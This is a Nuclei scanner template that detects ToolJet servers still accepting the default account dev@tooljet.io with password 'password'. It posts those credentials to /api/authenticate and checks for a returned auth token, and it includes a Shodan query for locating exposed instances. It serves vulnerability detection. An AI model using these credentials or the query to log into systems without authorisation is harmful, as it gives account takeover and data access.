id: tooljet-default-login

info:
  name: ToolJet - Default Login
  author: random-robbie
  severity: high
  description: |
    ToolJet contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://docs.tooljet.com/docs/contributing-guide/setup/docker/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    verified: true
    shodan-query: title:"tooljet"
  tags: default-login,tooljet

requests:
  - raw:
      - |
        POST /api/authenticate HTTP/2
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - dev@tooljet.io
      password:
        - password

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"auth_token":'
          - '"organization_id":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 201

# Enhanced by md on 2023/01/09
